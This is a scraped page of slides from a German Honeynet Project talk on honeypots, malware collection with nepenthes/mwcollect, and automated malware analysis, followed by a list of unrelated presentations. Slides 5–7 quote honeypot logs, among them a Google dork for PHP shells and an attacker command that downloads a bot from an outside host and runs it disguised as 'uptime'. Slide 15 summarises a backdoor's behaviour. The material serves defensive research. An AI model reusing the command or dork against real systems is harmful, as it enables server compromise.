the german honeynet project
play

The German Honeynet Project A short overview Thorsten Holz & - PowerPoint PPT Presentation

May 04, 2023 •281 likes •476 views

The German Honeynet Project A short overview Thorsten Holz & Markus Koetter UNIVERSITT MANNHEIM Pi1 - Laboratory for Dependable Distributed Systems Outline GenIII honeynets Google Hack Honeypots (GHH) nepenthes / mwcollect

  1. The German Honeynet Project A short overview Thorsten Holz & Markus Koetter UNIVERSITÄT MANNHEIM Pi1 - Laboratory for Dependable Distributed Systems

  2. Outline • GenIII honeynets • Google Hack Honeypots (GHH) • nepenthes / mwcollect • Automatic behaviour analysis of malware • Client-side honeypots UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  3. GenIII honeynet • Honeywall CD-ROM “roo” • very easy setup - just boot, install, and run • Honeypots running Linux and Windows • Different patch-level • Sebek to monitor system behaviour • Learn more about actual attacks • Phishing incident described in “Know Your Enemy: Phishing” article UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  4. Google Hack Honeypot • Web worms like Santy.A or Elxbot (Mambo) appeared in 2005 • Some of them use search engines like Google to find targets • GHH applies the concept of honeypots to learn more about this threat • Combining GenIII honeypots and GHH • Adding advertizement to honeypots UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  5. Google Hack Honeypot • Example of logfile output: PHPSHELL,01-09-2006 09:47:29 AM, XXX.70.107.165, /shell/phpshell.php,http://www.google.com/search? num=100hl=enlr=ie=UTF8safe=offq=intitle%3A% 22PHP+Shell+*%22+%22Enable+ stderr%22+filetype%3AphpbtnG=Search, text/xml application/xml application/xhtml+xml text/html;q=0.9 text/plain;q=0.8 image/png */*; q=0.5,ISO 8859 1 utf 8;q=0.7 *;q=0.7,gzip deflate,de de de;q=0.8 en us;q=0.5 en;q=0.3,keep alive,300, Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8) Gecko/20051111 Firefox/1.5, Known Search Engine: google.com;Target in URL; UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  6. Google Hack Honeypot • Example of logfile output: PHPSHELL,01-09-2006 09:47:48 AM, XXX.70.107.165, /shell/phpshell.php,http://[REMOVED]/shell/ phpshell.php, text/xml application/xml application/xhtml+xml text/html;q=0.9 text/plain;q=0.8 image/png */*;q=0.5, ISO 8859 1 utf 8;q=0.7 *;q=0.7,gzip deflate,de de de; q=0.8 en us;q=0.5 en;q=0.3,keep alive,300,Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8) Gecko/20051111 Firefox/1.5,ls; UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  7. Google Hack Honeypot • Example of logfile output: PHPSHELL,01-09-2006 11:02:29 AM, XXX.137.186.13, /shell/phpshell.php,http://[REMOVED]/shell/phpshell.php, image/gif image/x xbitmap image/jpeg image/pjpeg application/x shockwave flash application/vnd.ms excel application/vnd.ms powerpoint application/msword */*,,gzip deflate,en us,Keep Alive,,Mozilla/4.0 ( compatible; MSIE 6.0; Windows NT 5.1; SV1), cd /tmp/.kupdate;wget XXX.home.ro/mech.tar.gz; tar -zxvf mech.tar.gz;rm -rf mech.tar.gz; mv mech netstat;cd netstat; rm -rf mech.set; wget adultzone.home.ro/mech.set;mv mech uptime; chmod +x uptime;PATH=:$PATH;uptime;ps x; UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  8. nepenthes/mwcollect • Tools to automatically collect malware that propagates further by scanning for vulnerabilities • Emulate known vulnerabilities • Analyze received shellcode • Downloaded extracted URL • Automation to high degree possible • Can also be used to develop a new kind of IDS • See talk by Rogier Spoor on Surfnet IDS UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  9. nepenthes/mwcollect • Schematical overview of nepenthes UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  10. nepenthes/mwcollect • Large scale deployment with /17 network • If you have access to larger network, we could test even larger ones :-) • More than 60 million successful downloads • About 13.000 uniques files, based on md5sum • Results show that signature-based AV engines have problems (detection rate below 100%) • Upcoming “Know Your Enemy” paper on malware UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  11. nepenthes • Load average & KB/s UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  12. nepenthes • Logged downloads & submissions UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  13. nepenthes/mwcollect • Early-warning system based on nepenthes/ mwcollect UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  14. Binary Analysis • How to efficiently analyze the binaries collected by nepenthes/mwcollect? • Automated runtime binary analysis • API hooking to monitor all important API calls • Could also be extended to enumerate program execution • Not a fool-proof solution, but at least helps in analysis process UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  15. Binary Analysis • Similar project: Norman Sandbox Automatic Sandbox analysis of W32/Spybot.LWF [SANDBOX] infected with unknown security risk - W32/Backdoor [ General information ] * Locates window "NULL [class mIRC]" on desktop. * File length: 107520 bytes. [ Changes to filesystem ] * Creates file C:\WINDOWS\SYSTEM\patch.exe. * Deletes file 1. [ Changes to registry ] * Creates value "System of security"="patch.exe" in key "HKLM\Software\Microsoft\Windows \CurrentVersion\Run". * Creates value "System of security"="patch.exe" in key "HKLM\Software\Microsoft\Windows \CurrentVersion\RunServices". [ Network services ] * Looks for an Internet connection. UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  16. Stopping botnets • “Know Your Enemy: Tracking Botnets” gives a detailed introduction to botnets • Combining blocks introduced so far to help stopping botnets nepenthes, Sandbox, DNS, abuse IRC client, mwcollect, API hooking, handling, drone, ... GHH, GenIII, ... manually, ... blocking, ... UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  17. Client-side honeypot • More and more exploits against client applications • Recent WMF vulnerability • iFrame and several other exploits against IE • Can the concept of honeypots also be applied to learn more about this threat? • Similar projects • honeyclient.org by Kathy Wang • Honeymonkeys by Microsoft UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  18. Client-side honeypots Schematical setup UNIVERSITÄT Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems MANNHEIM

  19. Thorsten Holz http://www-pi1.informatik.uni-mannheim.de/ thorsten.holz@gmail.com More information: http://honeyblog.org UNIVERSITÄT MANNHEIM Pi1 - Laboratory for Dependable Distributed Systems

Recommend

INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE

INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE

INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS JOSH PYORRE Security Researcher Threat Analyst at NASA Threat Analyst at Mandiant @joshpyorre HONEYPOTS CURRENTLY IN USE

1.25k views • 96 slides
Thug: a low-interaction honeyclient Angelo Dell'Aera Speaker Chief Executive Officer @ Honeynet

Thug: a low-interaction honeyclient Angelo Dell'Aera Speaker Chief Executive Officer @ Honeynet

Thug: a low-interaction honeyclient Angelo Dell'Aera Speaker Chief Executive Officer @ Honeynet Project Information Security Independent Researcher @ Antifork Research (10+ years) Agenda Introduction Honeyclient technologies

465 views • 28 slides
How Attackers Go Undetected Covering Your Tracks As You Move Along Ayaz Ahmed Khan Pakistan

How Attackers Go Undetected Covering Your Tracks As You Move Along Ayaz Ahmed Khan Pakistan

How Attackers Go Undetected Covering Your Tracks As You Move Along Ayaz Ahmed Khan Pakistan Honeynet Project www.honeynet.org.pk Breaking into systems is easy. Well, usually, it is. Covering up the mess you

892 views • 29 slides
Catch me if you can! Angelo Dell'Aera Bologna 29/10/2016 A Little About Me Angelo Dell'Aera

Catch me if you can! Angelo Dell'Aera Bologna 29/10/2016 A Little About Me Angelo Dell'Aera

Catch me if you can! Angelo Dell'Aera Bologna 29/10/2016 A Little About Me Angelo Dell'Aera <angelo.dellaera@honeynet.org> Security Researcher @ Area 1 Security Full Member @ Honeynet Project Information Security Independent

680 views • 48 slides
D4 project https://www.d4-project.org/ 20190207 Alexandre Dulaunoy - Sami Mokaddem P roblem

D4 project https://www.d4-project.org/ 20190207 Alexandre Dulaunoy - Sami Mokaddem P roblem

D4 Project Open and collaborative network monitoring Team CIRCL D4 project https://www.d4-project.org/ 20190207 Alexandre Dulaunoy - Sami Mokaddem P roblem statement CSIRTs (or private organisations) build their own honeypot, honeynet or

549 views • 28 slides
German Village Project: Final Report Nicholas Gurich - Student in City planning at OSU Roxyanne

German Village Project: Final Report Nicholas Gurich - Student in City planning at OSU Roxyanne

German Village Project: Final Report Nicholas Gurich - Student in City planning at OSU Roxyanne Burrus - Advisor/Planning Consultant March 2012 German Village Project Final Report Summary In the fall quarter of 2011 seven OSU students,

393 views • 7 slides
D4 project https://www.d4-project.org/ 2019/07/03 TEAM CIRCL P roblem statement CSIRTs (or

D4 project https://www.d4-project.org/ 2019/07/03 TEAM CIRCL P roblem statement CSIRTs (or

D4 Project Open and collaborative network monitoring Team CIRCL D4 project https://www.d4-project.org/ 2019/07/03 TEAM CIRCL P roblem statement CSIRTs (or private organisations) build their own honeypot, honeynet or blackhole monitoring

577 views • 36 slides
D4 project https://www.d4-project.org/ 2019/05/22 TEAM CIRCL P roblem statement CSIRTs (or

D4 project https://www.d4-project.org/ 2019/05/22 TEAM CIRCL P roblem statement CSIRTs (or

D4 Project Open and collaborative network monitoring Team CIRCL D4 project https://www.d4-project.org/ 2019/05/22 TEAM CIRCL P roblem statement CSIRTs (or private organisations) build their own honeypot, honeynet or blackhole monitoring

844 views • 38 slides
SYRIAN HERITAGE ARCHIVE PROJECT German Archaeological Institute Museum of Islamic Art, Berlin

SYRIAN HERITAGE ARCHIVE PROJECT German Archaeological Institute Museum of Islamic Art, Berlin

Deutsches Archologisches Institut SYRIAN HERITAGE ARCHIVE PROJECT German Archaeological Institute Museum of Islamic Art, Berlin Franziska Bloch, Wassim Alrez, German Archaeological Institute AIA/ASOR Symposium Protecting our shared Heritage

152 views • 4 slides
Evaluating a Swiss German System that automatically translates German train announcements of

Evaluating a Swiss German System that automatically translates German train announcements of

Institute of Computational Linguistics Institute of Computational Linguistics Our project (I) Trainslate (train+translate). . . or trains late ;-) Evaluating a Swiss German System that automatically translates German train

336 views • 7 slides
Why learn German at A- level Business: Knowing the language of your German business partners

Why learn German at A- level Business: Knowing the language of your German business partners

Why learn German at A- level Business: Knowing the language of your German business partners improves your relations and therefore your chances for effective communication and success. Science and Research: German is the second most commonly used

416 views • 16 slides
Company Presentation December 2016 Market German Residential Safe Harbor and Low Risk German

Company Presentation December 2016 Market German Residential Safe Harbor and Low Risk German

Company Presentation December 2016 Market German Residential Safe Harbor and Low Risk German residential market: important pillar of the German economy With a GDP contribution of more than 430bn the German real estate industry represents

1.03k views • 64 slides
German e-Science Initiative 2003 Agenda 2006: The German e-Science Initiative is a

German e-Science Initiative 2003 Agenda 2006: The German e-Science Initiative is a

GridKa Karlsruhe, September 11 15, 2006 Building the German D-Grid *) Wolfgang Gentzsch D-Grid, RENCI, Duke, OGF, PCAST *) funded by the German Ministry for Education and Research 1 September, 2006 Wolfgang Gentzsch, D-Grid German

613 views • 34 slides
SANDBOXING How does a sandbox look like? Software or hardware appliances that receive suspicious

SANDBOXING How does a sandbox look like? Software or hardware appliances that receive suspicious

H ERE Claudio nex Guarnieri @botherder Security Researcher at Rapid7 Labs Core member of The Shadowserver Foundation Core member of The Honeynet Project Creator of Cuckoo Sandbox Founder of Malwr.com H ERE Mark

1.02k views • 89 slides
BDI The Voice of German Industry The Federation of German Industries Physikalisch-Technische

BDI The Voice of German Industry The Federation of German Industries Physikalisch-Technische

05.07.2018 BDI The Voice of German Industry The Federation of German Industries Physikalisch-Technische Bundesanstalt Final workshop of the blended Learning Quality Infrastructure for Sustainable Development Dr. Thomas Holtmann 5.

406 views • 12 slides
The German National Cohort (GNC) 19.11.2015 1 Aims of the German National Cohort To

The German National Cohort (GNC) 19.11.2015 1 Aims of the German National Cohort To

The German National Cohort (GNC) 19.11.2015 1 Aims of the German National Cohort To address research questions concerning a wide range of possible causes for major chronic diseases Extensive collection of health-related data

324 views • 28 slides
On the difference between the Federal German and the Austrian German discourse particle eh An

On the difference between the Federal German and the Austrian German discourse particle eh An

Linguistic Evidence 2018 On the difference between the Federal German and the Austrian German discourse particle eh An experimental investigation Sarah Zobel Feb 17, 2018 Introduction FG and AG eh Experiment Discussion Conclusion The

775 views • 65 slides
HELCOM Pre-core indicator Cumulative impacts on benthic biotopes Project results for the German

HELCOM Pre-core indicator Cumulative impacts on benthic biotopes Project results for the German

HELCOM Pre-core indicator Cumulative impacts on benthic biotopes Project results for the German Baltic Sea Birgit Heyden, Torsten Berg, MariLim presented by Juliane Wendt, IOW Basics Indicator D6C3 MSFD Indicator of high priority to

254 views • 10 slides
MPAs and fisheries management in the German EEZ Dr. Gesine Lange Consultant for the German

MPAs and fisheries management in the German EEZ Dr. Gesine Lange Consultant for the German

MPAs and fisheries management in the German EEZ Dr. Gesine Lange Consultant for the German Federal Agency for Nature Conservation (BfN) HELCOM STATE & CONSERVATION 11-2019, 21-25 October, Riga Structure of the presentation Introduction

171 views • 14 slides
II. JM Keynes and The General Theory (1936) 1.German and French translations The German

II. JM Keynes and The General Theory (1936) 1.German and French translations The German

II. JM Keynes and The General Theory (1936) 1.German and French translations The German translation by Fritz Waeger (1936) by Harald Hagemann Harald Hagemann 1 Outline 1. German Translations 2. The Role of Keynes in Germany 3. Keyness

474 views • 21 slides
The German Private Compulsory LTC Insurance and Its Relation to the German Social Security

The German Private Compulsory LTC Insurance and Its Relation to the German Social Security

IAAHS Colloquium 2004 - Dresden The German Private Compulsory LTC Insurance and Its Relation to the German Social Security System Roland Weber Verantwortlicher Aktuar Debeka Versicherungsgruppe Koblenz, Deutschland Folie 1 IAAHS Colloquium

436 views • 31 slides
The German American Partnership Program 1. October 2020- 30 students from a German high

The German American Partnership Program 1. October 2020- 30 students from a German high

The German American Partnership Program 1. October 2020- 30 students from a German high school travel to Bradenton, Florida 1 student will live with your October family for the month 2020 2. June 2021- - The same 30 Manatee

578 views • 29 slides
GERMAN LABOR AND EMPLOYMENT NEWS the scene is all too commonthe shareholders of a German

GERMAN LABOR AND EMPLOYMENT NEWS the scene is all too commonthe shareholders of a German

second Quarter 2005 German Federal Labor fail to terminate a Managing director within this two-week period, then the share- holders have waived their right to terminate the Managing director for cause. Contents solicitation of customers: a

422 views • 7 slides
in Germany the role of the German Association for Public and Private Welfare the German

in Germany the role of the German Association for Public and Private Welfare the German

The cooperation between the public sector and civil society in providing social services in Germany the role of the German Association for Public and Private Welfare the German welfare model: long history of public and private partnership

228 views • 9 slides

More recommend